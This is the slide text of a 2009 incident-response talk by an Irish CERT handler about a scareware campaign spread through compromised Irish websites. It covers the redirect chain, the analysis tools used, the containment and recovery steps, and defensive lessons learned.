Download presentation
Presentation is loading. Please wait.
Published byBritney McDaniel Modified over 8 years ago
1
Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS1 Scareware From Ireland Mark Hillick IrissCert Incident Handler http://www.iriss.ie http://www.iriss.ie mark.hillick@iriss.ie
2
Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS2 What is Scareware?
3
Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS3 Irish Scareware Exploit Browse to Irish website & collect your fake anti- virus
4
Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS4 Dialog-box fun…..
5
Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS5 Dialog-box fun cont…..
6
Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS6 System Scan
7
Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS7 Trojan Log file
8
Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS8 Money, please!
9
Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS9 Are you sure?
10
Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS10 Are you mad????
11
Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS11 BSOD
12
Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS12 Effect on the end-user….
13
Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS13 Exploit Exploited Sites hosted on one server Microsoft FTPd & IIS 6.0 Two most popular web site attacks – Gumblar PHP Sites Asprox SQL Injection
14
Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS14 Pass the Parcel http://compromisedsite.ie http://jobstopfil.biz http://poppka.net http://sujetline.ru http://grownclubfest.ru PDF & SWF files served back
15
Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS15 Obfuscation Engaged SANS ISC Malware Team Heavily obfuscated javascript Used techniques not seen before
16
Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS16 Complex Design….
17
Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS17 Tamper Data, Live HTTP Headers – Firefox Burp Suite Tcpdump, Wireshark & Netwitness Dig/nslookup Tools Used
18
Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS18 Incident Handling - Containment Source: http://www.tazworld.co.uk/gallery/pictures/www.tazworld.co.uk_taz_035.gifhttp://www.tazworld.co.uk/gallery/pictures/www.tazworld.co.uk_taz_035.gif © Warner Bros. Entertainment Inc.
19
Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS19 Incident Handling - Eradication Source -> http://www.alexross.com/CJ011.jpg © Warner Bros. Entertainment Inc
20
Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS20 Incident Handling - Recovery Dilbert ©2009, United Feature Syndicate, Inc.
21
Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS21 Incident Handling - Lessons Learned Patch web-server & application Input validation Close unnecessary open ports (e.g. FTP) Password Policy Regular back-ups Web-app security testing
22
Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS22 Securing the Desktop End-User Defence Rescue CDs Google -> “rescue site:raymond.cc” Free Tools http://zeltser.com/fighting-malicious-software/
23
Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS23 Next Steps & Extra Info Sans GCIH Gold Paper Scareware & its evolution Incident Handling Process Full Incident Report http://www.iriss.ie – in shared documents http://www.hillick.net/things/scareware.doc
24
Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS24 References Sunbelt Blog Dancho Danchev Blog SANS ISC (Thanks to @bojanz) VRT-Sourcefire Blog Symantec White Papers Sans Forensics Blog
25
Scareware From Ireland - Twitter "markofu" & "irisscert" © 2009 IRISS25 That's it..... Hat Tip for image - Jesse M. Heines - http://teaching.cs.uml.edu/~heines/images/questions.gif
Similar presentations
© 2024 SlidePlayer.com Inc.
All rights reserved.